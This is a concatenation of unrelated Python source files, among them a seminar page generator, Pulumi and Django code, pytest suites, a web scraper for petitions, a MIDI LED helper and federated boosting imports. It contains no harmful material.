@dataclass
class SeminarList:
seminars: list[Seminar]
def __post_init__(self):
self.seminars = sorted(
self.seminars, key=lambda seminar: seminar.date, reverse=True
)
HEADER = """
Click on each seminar to see more details.
"""
CALENDAR = (
calendar.HTMLCalendar()
.formatmonth(datetime.today().year, datetime.today().month)
.replace(
f">{int(datetime.today().day)}<",
f' bgcolor="#66ff66"><b><u>{int(datetime.today().day)}</u></b><',
)
)
BEGIN_UPCOMING_SEMINARS = """
## Upcoming Seminars
"""
END_UPCOMING_SEMINARS = """
> Want to add *your* seminar? Check if the date of interest is available and take a look at [the instructions page](/seminars/instructions).
"""
BEGIN_PAST_SEMINARS = """
## Past Seminars
"""
END_PAST_SEMINARS = ""
def to_markdown(self):
next_seminars = filter(
lambda seminar: seminar.date >= datetime.today(), self.seminars
)
past_seminars = filter(
lambda seminar: seminar.date < datetime.today(), self.seminars
)
return (
self.HEADER
+ self.CALENDAR
+ self.END_UPCOMING_SEMINARS
+ self.BEGIN_UPCOMING_SEMINARS
+ "".join(seminar.to_markdown() for seminar in next_seminars)
+ self.BEGIN_PAST_SEMINARS
+ "".join(seminar.to_markdown() for seminar in past_seminars)
+ self.END_PAST_SEMINARS
)
@staticmethod
def from_github_issues(issues, logger=None):
seminars = [
Seminar.from_github_issue(issue, logger=logger)
for issue in issues
if Seminar.SEMINAR_TITLE_MARKER in issue["title"]
]
return SeminarList(seminars)
@staticmethod
def from_github_repo(owner, repo, token=None, logger=None):
issues = request_github_api(
f"https://api.github.com/repos/{owner}/{repo}/issues",
owner=owner,
token=token,
logger=logger,
)
return SeminarList.from_github_issues(issues, logger=logger)
if __name__ == "__main__":
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
seminars = SeminarList.from_github_repo(
owner="geem-lab", repo="seminars", logger=logger
)
print(seminars.to_markdown())
| 7,019 | 2,239 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'GetPlaceIndexResult',
'AwaitableGetPlaceIndexResult',
'get_place_index',
'get_place_index_output',
]
@pulumi.output_type
class GetPlaceIndexResult:
def __init__(__self__, arn=None, create_time=None, index_arn=None, update_time=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if create_time and not isinstance(create_time, str):
raise TypeError("Expected argument 'create_time' to be a str")
pulumi.set(__self__, "create_time", create_time)
if index_arn and not isinstance(index_arn, str):
raise TypeError("Expected argument 'index_arn' to be a str")
pulumi.set(__self__, "index_arn", index_arn)
if update_time and not isinstance(update_time, str):
raise TypeError("Expected argument 'update_time' to be a str")
pulumi.set(__self__, "update_time", update_time)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> Optional[str]:
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="indexArn")
def index_arn(self) -> Optional[str]:
return pulumi.get(self, "index_arn")
@property
@pulumi.getter(name="updateTime")
def update_time(self) -> Optional[str]:
return pulumi.get(self, "update_time")
class AwaitableGetPlaceIndexResult(GetPlaceIndexResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPlaceIndexResult(
arn=self.arn,
create_time=self.create_time,
index_arn=self.index_arn,
update_time=self.update_time)
def get_place_index(index_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPlaceIndexResult:
"""
Definition of AWS::Location::PlaceIndex Resource Type
"""
__args__ = dict()
__args__['indexName'] = index_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:location:getPlaceIndex', __args__, opts=opts, typ=GetPlaceIndexResult).value
return AwaitableGetPlaceIndexResult(
arn=__ret__.arn,
create_time=__ret__.create_time,
index_arn=__ret__.index_arn,
update_time=__ret__.update_time)
@_utilities.lift_output_func(get_place_index)
def get_place_index_output(index_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPlaceIndexResult]:
"""
Definition of AWS::Location::PlaceIndex Resource Type
"""
...
| 3,245 | 1,005 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-11-07 19:24
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('dashboard', '0029_auto_20171017_2329'),
]
operations = [
migrations.RenameField(
model_name='post',
old_name='private_reply_count',
new_name='private_comment_count',
),
migrations.RenameField(
model_name='post',
old_name='reply_count',
new_name='public_comment_count',
),
]
| 611 | 212 |
# coding=utf-8
'''
Created on 2016-12-5
@author: Administrator
'''
from doraemon.ci.models import CITaskFlow, CIFlowSectionHistory, CITaskFlowHistory
from url_filter.filtersets.django import ModelFilterSet
class CITaskFlowFilterSet(ModelFilterSet):
class Meta(object):
model = CITaskFlow
fields = ['id', 'Project']
class CITaskFlowHistoryFilterSet(ModelFilterSet):
class Meta(object):
model = CITaskFlowHistory
fields = ['id', 'TQUUID', 'Status', 'TaskFlow']
class CIFlowSectionHistoryFilterSet(ModelFilterSet):
class Meta(object):
model = CIFlowSectionHistory
fields = ['id', 'TQUUID', 'Status', 'TaskFlow', 'TaskFlowHistory', 'Section']
| 707 | 223 |
#!/usr/bin/python
import sys
# input comes from STDIN (standard input)
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into words
element1 = line.split(',')
c = 0
for element in element1:
c += 1
if c == 1:
print (element1)
else:
continue | 387 | 118 |
from alembic import util, command, config
import argparse
import inspect
class AlembicCommandLine(object):
prog = None
description = None
allowed_commands = None
def __init__(self, prog=None, description=None, allowed_commands=None):
if prog is not None:
self.prog = prog
if description is not None:
self.description = description
if allowed_commands is not None:
self.allowed_commands = allowed_commands
self.parser = self.generate_options()
def add_command_options(self, parser, positional, kwargs):
if 'template' in kwargs:
parser.add_argument("-t", "--template",
default='generic',
type=str,
help="Setup template for use with 'init'")
if 'message' in kwargs:
parser.add_argument("-m", "--message",
type=str,
help="Message string to use with 'revision'")
if 'sql' in kwargs:
parser.add_argument("--sql",
action="store_true",
help="Don't emit SQL to database - dump to "
"standard output/file instead")
if 'tag' in kwargs:
parser.add_argument("--tag",
type=str,
help="Arbitrary 'tag' name - can be used by "
"custom env.py scripts.")
if 'autogenerate' in kwargs:
parser.add_argument("--autogenerate",
action="store_true",
help="Populate revision script with candidate "
"migration operations, based on comparison "
"of database to model.")
# "current" command
if 'head_only' in kwargs:
parser.add_argument("--head-only",
action="store_true",
help="Only show current version and "
"whether or not this is the head revision.")
if 'rev_range' in kwargs:
parser.add_argument("-r", "--rev-range",
action="store",
help="Specify a revision range; "
"format is [start]:[end]")
positional_help = {
'directory': "location of scripts directory",
'revision': "revision identifier"
}
for arg in positional:
parser.add_argument(arg, help=positional_help.get(arg))
def add_options(self, parser):
parser.add_argument("-c", "--config",
type=str,
default="alembic.ini",
help="Alternate config file")
parser.add_argument("-n", "--name",
type=str,
default="alembic",
help="Name of section in .ini file to "
"use for Alembic config")
parser.add_argument("-x", action="append",
help="Additional arguments consumed by "
"custom env.py scripts, e.g. -x "
"setting1=somesetting -x setting2=somesetting")
def generate_options(self):
parser = argparse.ArgumentParser(prog=self.prog)
self.add_options(parser)
subparsers = parser.add_subparsers()
for fn, name, doc, positional, kwarg in self.get_commands():
subparser = subparsers.add_parser(name, help=doc)
self.add_command_options(subparser, positional, kwarg)
subparser.set_defaults(cmd=(fn, positional, kwarg))
return parser
def get_commands(self):
cmds = []
for fn in [getattr(command, n) for n in dir(command)]:
if (inspect.isfunction(fn) and
fn.__name__[0] != '_' and
fn.__module__ == 'alembic.command'):
if (self.allowed_commands and
fn.__name__ not in self.allowed_commands):
continue
spec = inspect.getargspec(fn)
if spec[3]:
positional = spec[0][1:-len(spec[3])]
kwarg = spec[0][-len(spec[3]):]
else:
positional = spec[0][1:]
kwarg = []
cmds.append((fn, fn.__name__, fn.__doc__, positional, kwarg))
return cmds
def get_config(self, options):
return config.Config(file_=options.config,
ini_section=options.name,
cmd_opts=options)
def run_cmd(self, config, options):
fn, positional, kwarg = options.cmd
try:
fn(config, *[getattr(options, k) for k in positional],
**dict((k, getattr(options, k)) for k in kwarg))
except util.CommandError as e:
util.err(str(e))
def main(self, argv=None):
options = self.parser.parse_args(argv)
if not hasattr(options, "cmd"):
# see http://bugs.python.org/issue9253, argparse
# behavior changed incompatibly in py3.3
self.parser.error("too few arguments")
else:
self.run_cmd(self.get_config(options), options)
if __name__ == '__main__':
cmdline = AlembicCommandLine()
cmdline.main()
| 5,589 | 1,448 |
"""
Here we test `glamor.include_scope_in_title` and
`glamor.logging_allure_steps` functions.
"""
import io
import logging
from allure_commons_test.container import has_container
from allure_commons_test.report import has_test_case
from hamcrest import assert_that
from glamor.patches import PatchHelper, include_scope_in_title
import glamor as allure
import pitest as pytest
from .matchers import has_after, has_before
autouse_values = ('True', 'False')
scopes = ('function', 'class', 'module', 'package', 'session')
def scopes_ids(val):
return f'scope={val}'
def autouse_ids(val):
return f'autouse={val}'
@pytest.mark.parametrize('autouse', autouse_values, ids=autouse_ids)
@pytest.mark.parametrize('scope', scopes, ids=scopes_ids)
@pytest.mark.parametrize('place', ('before', 'after'))
@pytest.mark.parametrize('include_autouse', autouse_values)
class TestInclude:
@pytest.fixture
def monkey_patchhelper(self):
p = PatchHelper
backup_add_autouse = getattr(p, '_add_autouse')
backup_add_scope_after_name = getattr(p, '_add_scope_after_name')
backup_add_scope_before_name = getattr(p, '_add_scope_before_name')
yield
setattr(p, '_add_autouse', backup_add_autouse)
setattr(p, '_add_scope_after_name', backup_add_scope_after_name)
setattr(p, '_add_scope_before_name', backup_add_scope_before_name)
include_scope_in_title.called = False
def test_scope_autouse(
self,
glamor_pytester,
scope: str,
autouse: str,
place: str,
include_autouse: str,
monkey_patchhelper,
):
setup = 'FANCY setup name'
tear = 'FANCY teardown name'
test_name = 'test_test'
fixt_one = 'fixture_one'
fixt_two = 'fixture_two'
autouse_prefix = 'a' if {autouse, include_autouse} == {'True'} else ''
glamor_pytester.pytester.makepyfile(
f"""
import glamor as allure
import pitest as pytest
allure.include_scope_in_title('{place}', autouse={include_autouse})
@pytest.fixture(scope='{scope}', autouse={autouse})
@allure.title.setup('{setup}')
@allure.title.teardown('{tear}')
def {fixt_one}():
yield
@pytest.fixture
def {fixt_two}():
yield
def {test_name}({fixt_one}, {fixt_two}):
pass
"""
)
prefix = f'[{scope[:1].upper()}{autouse_prefix}]'
if place == 'before':
prefixed_setup_one = f'{prefix} {setup}'
prefixed_tear_one = f'{prefix} {tear}'
prefixed_fixt_two = f'[F] {fixt_two}'
elif place == 'after':
prefixed_setup_one = f'{setup} {prefix}'
prefixed_tear_one = f'{tear} {prefix}'
prefixed_fixt_two = f'{fixt_two} [F]'
else:
raise RuntimeError('Unknown "place" parameter')
glamor_pytester.runpytest()
report = glamor_pytester.allure_report
assert_that(
report,
has_test_case(
test_name,
has_container(
report,
has_before(prefixed_setup_one),
has_after(prefixed_tear_one),
),
has_container(
report,
has_before(prefixed_fixt_two),
has_after(prefixed_fixt_two),
),
),
)
def test_fixture_as_method(
self,
glamor_pytester,
scope: str,
autouse: str,
place: str,
include_autouse: str,
monkey_patchhelper,
):
fixt_name = 'fixt'
test_name = 'test_in_class'
glamor_pytester.pytester.makepyfile(
f"""
import pitest as pytest
import glamor as allure
allure.include_scope_in_title('{place}', autouse={include_autouse})
class TestClass:
@pytest.fixture(scope='{scope}', autouse={autouse})
def {fixt_name}(self):
yield
def {test_name}(self, fixt):
pass
"""
)
glamor_pytester.runpytest()
report = glamor_pytester.allure_report
autouse_prefix = 'a' if {autouse, include_autouse} == {'True'} else ''
prefix = f'[{scope[:1].upper()}{autouse_prefix}]'
if place == 'before':
fixt_title = f'{prefix} {fixt_name}'
elif place == 'after':
fixt_title = f'{fixt_name} {prefix}'
else:
raise RuntimeError('Unknown "place" parameter')
assert_that(
report,
has_test_case(
test_name,
has_container(
report,
has_before(fixt_title),
has_after(fixt_title),
),
),
)
class TestLogging:
logger_name = 'GlamorAsAllureLogger'
@pytest.fixture(autouse=True)
def backup_and_store_step_ctx(self):
backup_enter = allure.step_ctx.__enter__
yield
allure.step_ctx.__enter__ = backup_enter
@pytest.fixture
def logger_stream(self):
logger = logging.getLogger(self.logger_name)
logger.setLevel(logging.INFO)
stream = io.StringIO()
handler = logging.StreamHandler(stream=stream)
handler.setLevel(logging.INFO)
fmt = logging.Formatter('[%(levelname)s] %(message)s')
handler.setFormatter(fmt)
logger.addHandler(handler)
yield logger, stream
logger.handlers.clear()
@pytest.mark.parametrize('switch', ('on', 'off'))
@pytest.mark.parametrize('times', (1, 2), ids=('once', 'twice'))
def test_logging_step_can_be_on_or_off(self, logger_stream, switch, times):
logger, stream = logger_stream
for i in range(times):
allure.logging_allure_steps(logger if switch == 'on' else None)
expected_messages = []
logger.info('start message')
expected_messages.append('[INFO] start message')
with allure.step('step message'):
if switch == 'on':
expected_messages.append('[STEP] step message')
logger.error('end message')
expected_messages.append('[ERROR] end message')
logger_messages = stream.getvalue().strip().split('\n')
assert logger_messages == expected_messages
@pytest.mark.parametrize('start', ('on', 'off'))
@pytest.mark.parametrize('steps', (1, 2, 3, 4))
def test_logging_state_can_be_changed(self, start, logger_stream, steps):
logger, stream = logger_stream
expected_messages = []
odd = logger if start == 'on' else None
even = None if start == 'on' else logger
allure.logging_allure_steps(odd)
with allure.step('one'):
if odd:
expected_messages.append('[STEP] one')
if steps >= 2:
allure.logging_allure_steps(even)
with allure.step('two'):
if even:
expected_messages.append('[STEP] two')
if steps >= 3:
allure.logging_allure_steps(odd)
with allure.step('three'):
if odd:
expected_messages.append('[STEP] three')
if steps >= 4:
allure.logging_allure_steps(even)
with allure.step('four'):
if even:
expected_messages.append('[STEP] four')
logger_messages_str = stream.getvalue().strip()
if logger_messages_str:
logger_messages = logger_messages_str.split('\n')
else:
logger_messages = []
assert expected_messages == logger_messages
| 7,892 | 2,434 |
# proxy module
from pyface.message_dialog import *
| 51 | 15 |
import requests
import pprint
import time
from datetime import datetime
def send_push(text):
try:
print(f"Send push: {text}")
TOKEN = "put your token here"
args = {"title": text, "identifier": TOKEN}
requests.get("https://pushmeapi.jagcesar.se", params=args)
except Exception as e:
print(f"Error send push {e}")
def get_data(district_id):
data = None
try:
GET_URL = f"https://gorzdrav.spb.ru/_api/api/district/{district_id}/lpu"
r = requests.get(GET_URL)
data = r.json()
if r.status_code != 200:
send_push("ERROR get data")
except Exception as e:
print(e)
send_push("ERROR get data")
return data
send_push("Hello from python")
# Get info from https://gorzdrav.spb.ru/service-covid-vaccination-schedule
# Put your hospital number here
HOSPITAL_NAME_PATTERN = "78"
# District ID
DISTRIC_ID = 17
REFRESH_PERIOD = 10 * 60
RETRY_PERIOD = 5 * 60
if __name__ == '__main__':
while True:
print("---------------------------------------------------------")
now = datetime.now()
print(now.strftime("%d/%m/%Y %H:%M:%S"))
data = get_data(DISTRIC_ID)
if not data:
send_push(f"No data, wait {RETRY_PERIOD} and try againt")
time.sleep(REFRESH_PERIOD)
continue
try:
for item in data["result"]:
if HOSPITAL_NAME_PATTERN in item["lpuShortName"]:
print(f"Check hospital {item['lpuShortName']}")
print(item["covidVaccination"])
if item["covidVaccination"]:
send_push("REGISTRATION IS OPEN")
except Exception as e:
send_push(f"Error parse responce {e}")
time.sleep(REFRESH_PERIOD)
| 1,827 | 611 |
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models.fields import BigIntegerField
from django.utils.translation import ugettext_lazy as _
from .bitcoin import Bitcoin
HEX_CHARS = "0123456789abcdefABCDEF"
def validate_hex(hex_string):
if not (len(hex_string) % 2 == 0):
raise ValidationError(
"Hex should have even number of characters: %s" % hex_string
)
if any(c not in HEX_CHARS for c in hex_string):
raise ValidationError("Invalid char in hex string: %s" % hex_string)
class HexField(models.CharField):
description = _("Hex encoding as a string.")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.validators.append(validate_hex)
class BitcoinField(BigIntegerField):
description = _("Bitcoin amount in satoshis.")
# pylint: disable=unused-argument
def from_db_value(self, value, expression, connection):
return self.to_python(value)
def to_python(self, value):
if value is None or isinstance(value, Bitcoin):
return value
try:
return Bitcoin(value)
except (TypeError, ValueError):
raise ValidationError(
"value {} must be an integer or string representing one.".format(value)
)
def get_prep_value(self, value):
"""
Prepares value for parameter in query.
The value type is fairly flexible, but floats are explicitly not allowed.
"""
if value is None:
return None
if isinstance(value, Bitcoin):
return value.satoshis
if type(value) == float:
raise TypeError("Cannot use float with BitcoinField")
return Bitcoin(value).satoshis
| 1,801 | 521 |
#
# @lc app=leetcode id=96 lang=python3
#
# [96] Unique Binary Search Trees
#
# @lc code=start
class Solution:
def numTrees(self, n: int):
if n < 2:
return n
dp = [0] * n
# @lc code=end
| 239 | 99 |
from typing import Callable, List
class Message():
"""
Stores the notes and their new colors.
All functions return themselves (except for xy), so you can chain calls.
To get the actual sysex data (not including the 0xF0 to start and 0xF7 to end the message),
call the object like a function.
Example:
msg = Message().row(0, 1, 0.5, 0.25)
msg.note(1, 1, 1, 0.5, 0.25).note(8, 1, 1, 0.5, 0.25)
data = msg()
"""
rgb_header = [0x00, 0x20, 0x29, 0x02, 0x18, 0x0B]
def __init__(self):
self.data = {}
def __call__(self) -> List:
"""
Returns the data formatted correctly as a sysex message.
The returned list is ready to be put into any MIDI message library, such as mido.
"""
sysex_data = Message.rgb_header[:]
for k, v in self.data.items():
sysex_data += [k] + v
return sysex_data
def xy(self, x: int, y: int):
"""
Convinence function to convert an x and y coordinate into the ID of the cooresponding LED.
LEDs are numbered from 11 to 89. The first row is 11 thru 19, second row is 21 thru 19, etc.
Only works in session mode, so don't switch to user mode. (That can only be done with another sysex message, so you won't mess it up unless you try.)
"""
return (y + 1) * 10 + (x + 1)
def range(self, x1: int, y1: int, x2: int, y2: int, red: float, green: float, blue: float):
"""
Sets a range of LEDs to the provided color.
"""
for x in range(x1, x2+1):
for y in range(y1, y2+1):
self.data[self.xy(x, y)] = [red*63, green*63, blue*63]
return self
def range_func(self, x1: int, y1: int, x2: int, y2: int, function: Callable[[int, int], List[float]]):
"""
Sets a range of LEDs to a color provided by a function.
The function should take an x and y coordinate and return a list with 3 float values from 0 to 1.
"""
for x in range(x1, x2+1):
for y in range(y1, y2+1):
generated_data = function(x, y)
cleaned_data = [0, 0, 0]
for i in range(3):
if i < len(generated_data):
cleaned_data[i] = generated_data * 63
self.data[self.xy(x, y)] = cleaned_data
return self
def row(self, row: int, red: float, green: float, blue: float):
"""
Sets an entire row of LEDs to the provided color.
"""
self.range(0, row, 7, row, red, green, blue)
return self
def col(self, col: int, red: float, green: float, blue: float):
"""
Sets an entire column of LEDs to the provided color.
"""
self.range(row, 0, row, 7, red, green, blue)
return self
def note(self, x: int, y: int, red: float, green: float, blue: float):
"""
Sets a single LED to the provided color.
"""
self.data[self.xy(x, y)] = [red*63, green*63, blue*63]
return self
| 3,064 | 1,040 |
"""Tests for exporters.py"""
import pytest
import io
from deepcell_label import models
from deepcell_label import exporters
from deepcell_label.conftest import DummyLoader
@pytest.fixture
def npz_exporter(app, db_session):
with app.app_context():
db_session.autoflush = False
project = models.Project.create(DummyLoader(path='test.npz'))
exporter = exporters.Exporter(project)
return exporter
@pytest.fixture
def trk_exporter(app, db_session):
with app.app_context():
db_session.autoflush = False
project = models.Project.create(DummyLoader(path='test.trk'))
exporter = exporters.Exporter(project)
return exporter
class TestExporter():
def test_export_npz(self, npz_exporter):
file_ = npz_exporter.export()
assert isinstance(file_, io.BytesIO)
def test_export_trk(self, trk_exporter):
file_ = trk_exporter.export()
assert isinstance(file_, io.BytesIO)
class TestS3Exporter():
def test_export(self, mocker, app, db_session):
with app.app_context():
mocked = mocker.patch('boto3.s3.inject.upload_fileobj')
db_session.autoflush = False
project = models.Project.create(DummyLoader())
exporter = exporters.S3Exporter(project)
exporter.export('test')
mocked.assert_called()
| 1,377 | 441 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import csv
import logging
import os
import random
import re
from concurrent.futures import ThreadPoolExecutor
from typing import Dict
from urllib import request
from urllib.error import HTTPError
from bs4 import BeautifulSoup
DATA_DIR = 'data'
CSV_FILE_WHOLE = os.path.join(DATA_DIR, 'petition.csv')
CSV_FILE_CORRUPTED = os.path.join(DATA_DIR, 'petition_corrupted.csv')
CSV_FILE_SAMPLED = os.path.join(DATA_DIR, 'petition_sampled.csv')
SAMPLE_RATE = 0.05
logging.basicConfig(level=logging.INFO)
def main():
# 데이터 저장 디렉터리 생성
try:
os.mkdir(DATA_DIR)
except FileExistsError:
pass
# 새로 만료된 청원을 수집하여 CSV 파일에 덧붙이기
latest_id = get_latest_article_id()
next_id = get_latest_saved_article_id() + 1
logging.info(
f'From {next_id} to {latest_id}: '
f'about {latest_id - next_id} articles to go...'
)
with ThreadPoolExecutor(max_workers=2) as exe:
for article in exe.map(fetch_article, range(next_id, latest_id)):
if article is None:
continue
save_article(article)
logging.info(
f'{article["article_id"]} of {latest_id}: {article["title"]}'
)
random.seed(0)
generate_corrupted_data()
generate_sampled_data()
def generate_corrupted_data():
"""일부 필드값을 고의로 삭제한 CSV 파일 만들기"""
candidates = ['category', 'votes', 'start', 'end']
with open(CSV_FILE_WHOLE, 'r') as whole:
with open(CSV_FILE_CORRUPTED, 'w') as corrupted:
csvr = csv.DictReader(whole)
csvw = csv.DictWriter(corrupted, csvr.fieldnames)
for row in csvr:
# 범주가 '육아/교육'이고 투표수가 50건 초과이면 20% 확률로 투표수에 결측치 넣기
category = row['category'] == '육아/교육'
votes = int(row['votes']) > 50
if category and votes and random.random() <= 0.2:
row['votes'] = ''
csvw.writerow(row)
# 각 행마다 5% 확률로 특정 필드에 결측치 넣기
if random.random() <= 0.05:
key = random.choice(candidates)
row[key] = ''
def generate_sampled_data():
"""전체 CSV 파일에서 일부만 임의추출하여 작은 CSV 파일 만들기"""
with open(CSV_FILE_WHOLE, 'r') as whole:
with open(CSV_FILE_SAMPLED, 'w') as sampled:
sampled.write(whole.readline())
sampled.writelines(
l for l in whole if random.random() <= SAMPLE_RATE
)
def get_latest_article_id() -> int:
"""만료된 청원 목록 페이지를 분석하여 가장 최근에 만료된 글번호를 가져오기"""
html = fetch_html('https://www1.president.go.kr/petitions?only=finished')
soup = BeautifulSoup(html, "html5lib")
href = soup.select_one('.bl_body .bl_wrap .bl_subject a')['href']
article_id = int(re.match(r'.+/petitions/(\d+).*', href).group(1))
return article_id
def get_latest_saved_article_id() -> int:
"""이미 저장한 가장 최근 글번호를 가져오기. 저장된 글이 없으면 0을 반환"""
# 글이 없으면 0
if not os.path.isfile(CSV_FILE_WHOLE):
return 0
# 파일 끝 부분에서 몇 줄 읽어온 뒤 마지막 줄의 첫 칼럼(article_id) 반환
with open(CSV_FILE_WHOLE, 'rb') as f:
# 마지막 줄을 빠르게 찾기 위해 "거의" 끝 부분으로 이동
f.seek(0, os.SEEK_END)
f.seek(-min([f.tell(), 1024 * 100]), os.SEEK_CUR)
# 마지막 줄에서 article id 추출
last_line = f.readlines()[-1].decode('utf-8')
article_id = int(last_line.split(',')[0])
return article_id
def fetch_article(article_id: int) -> Dict[str, any]:
"""글번호에 해당하는 글의 HTML 텍스트를 가져와서 파싱. 해당 글이 없으면 None"""
url = f'https://www1.president.go.kr/petitions/{article_id}'
try:
html = fetch_html(url)
except ValueError:
return None
soup = BeautifulSoup(html, "html5lib")
title = query(soup, '.petitionsView_title')
votes = int(query(soup, '.petitionsView_count .counter').replace(',', ''))
category = query(soup, '.petitionsView_info_list li:nth-of-type(1)')[4:]
start = query(soup, '.petitionsView_info_list li:nth-of-type(2)')[4:]
end = query(soup, '.petitionsView_info_list li:nth-of-type(3)')[4:]
answered = query(soup, '.petitionsView_progress h4') == '브리핑'
if answered:
content_selector = '.petitionsView_write > div:nth-of-type(4)'
else:
content_selector = '.petitionsView_write > div:nth-of-type(2)'
content = remove_whitespaces(query(soup, content_selector)) \
.replace('\n', '\\n') \
.replace('\t', '\\t')
return {
'article_id': article_id,
'title': title,
'votes': votes,
'answered': 1 if answered else 0,
'category': category,
'start': start,
'end': end,
'content': content,
}
def save_article(article: Dict[str, any]) -> None:
"""글을 CSV 형태로 저장한다"""
cols = [
'article_id', 'start', 'end', 'answered', 'votes', 'category', 'title',
'content'
]
# 파일이 없으면 새로 만들고 칼럼 이름 저장
if not os.path.isfile(CSV_FILE_WHOLE):
with open(CSV_FILE_WHOLE, 'w', newline='') as f:
w = csv.writer(f)
w.writerow(cols)
# 새로운 행 추가
with open(CSV_FILE_WHOLE, 'a', newline='') as f:
w = csv.writer(f)
w.writerow(article[col] for col in cols)
def fetch_html(url: str) -> str:
"""웹에서 HTML 문서를 읽어서 반환"""
try:
with request.urlopen(url) as f:
if f.getcode() != 200:
raise ValueError(f'Invalid status code: {f.getcode()}')
html = f.read().decode('utf-8')
return html
except HTTPError as e:
if e.code == 404:
raise ValueError(f'Not found: {url}')
else:
raise e
def query(soup: BeautifulSoup, selector: str) -> str:
"""CSS selector로 요소를 찾은 뒤 텍스트 컨텐츠를 반환"""
return soup.select_one(selector).text
def remove_whitespaces(text: str) -> str:
"""본문 텍스트에서 불필요한 공백 문자들 제거"""
lines = text.split('\n')
lines = (l.strip() for l in lines)
lines = (l for l in lines if len(l) > 0)
return '\n'.join(lines)
if __name__ == '__main__':
main()
| 6,047 | 2,737 |
from PyQt5 import QtGui
from PyQt5.QtWidgets import QApplication, QMainWindow
import sys
from PyQt5.QtGui import QPainter, QBrush, QPen, QLinearGradient
from PyQt5.QtCore import Qt
class Window(QMainWindow):
def __init__(self):
super().__init__()
self.title = "PyQt5 Window"
self.top = 200
self.left = 500
self.width = 400
self.height = 300
self.InitWindow()
def InitWindow(self):
self.setWindowIcon(QtGui.QIcon("icon.png"))
self.setWindowTitle(self.title)
self.setGeometry(self.left, self.top, self.width, self.height)
self.show()
def paintEvent(self, e):
painter = QPainter(self)
painter.setPen(QPen(Qt.black, 0, Qt.SolidLine))
grad1 = QLinearGradient(0, 0, 200, 200)
grad1.setColorAt(0.0, Qt.darkGray)
grad1.setColorAt(0.5, Qt.green)
grad1.setColorAt(1.0, Qt.yellow)
painter.setBrush(QBrush(grad1))
painter.drawRect(10, 10, 200, 200)
App = QApplication(sys.argv)
window = Window()
sys.exit(App.exec())
| 1,080 | 410 |
from quart import render_template, g
from lnbits.decorators import check_user_exists, validate_uuids
from . import lndhub_ext
@lndhub_ext.route("/")
@validate_uuids(["usr"], required=True)
@check_user_exists()
async def lndhub_index():
return await render_template("lndhub/index.html", user=g.user)
| 317 | 119 |
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
class DeletedUser(models.Model):
DELETED_BY_SELF = 1
DELETED_BY_STAFF = 2
DELETED_BY_SYSTEM = 3
DELETED_BY_CHOICES = (
(DELETED_BY_SELF, _("By self")),
(DELETED_BY_STAFF, _("By staff")),
(DELETED_BY_SYSTEM, _("By system")),
)
deleted_on = models.DateTimeField(default=timezone.now, db_index=True)
deleted_by = models.PositiveIntegerField(choices=DELETED_BY_CHOICES, db_index=True)
class Meta:
ordering = ["-id"]
| 600 | 241 |
# Copyright 2021 Tianmian Tech. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
from operator import itemgetter
from typing import List
import numpy as np
from numpy import random
from common.python.utils import log_utils
from kernel.components.binning.horzfeaturebinning.horz_split_points import HorzFeatureBinningClient
from kernel.components.boosting import BoostingTree
from kernel.components.boosting import HorzDecisionTreeClient
from kernel.components.boosting import SecureBoostClientAggregator
from kernel.components.evaluation.param import EvaluateParam
from kernel.model_selection.k_fold import KFold
from kernel.optimizer.loss import FairLoss
from kernel.optimizer.loss import HuberLoss
from kernel.optimizer.loss import LeastAbsoluteErrorLoss
from kernel.optimizer.loss import LeastSquaredErrorLoss
from kernel.optimizer.loss import LogCoshLoss
from kernel.optimizer.loss import SigmoidBinaryCrossEntropyLoss
from kernel.optimizer.loss import SoftmaxCrossEntropyLoss
from kernel.optimizer.loss import TweedieLoss
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import DecisionTreeModelMeta, CriterionMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import ObjectiveMeta
from kernel.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import DecisionTreeModelParam
from kernel.protobuf.generated.boosting_tree_model_param_pb2 import FeatureImportanceInfo
from kernel.transfer.variables.transfer_class.horz_secure_boost_transfer_variable import \
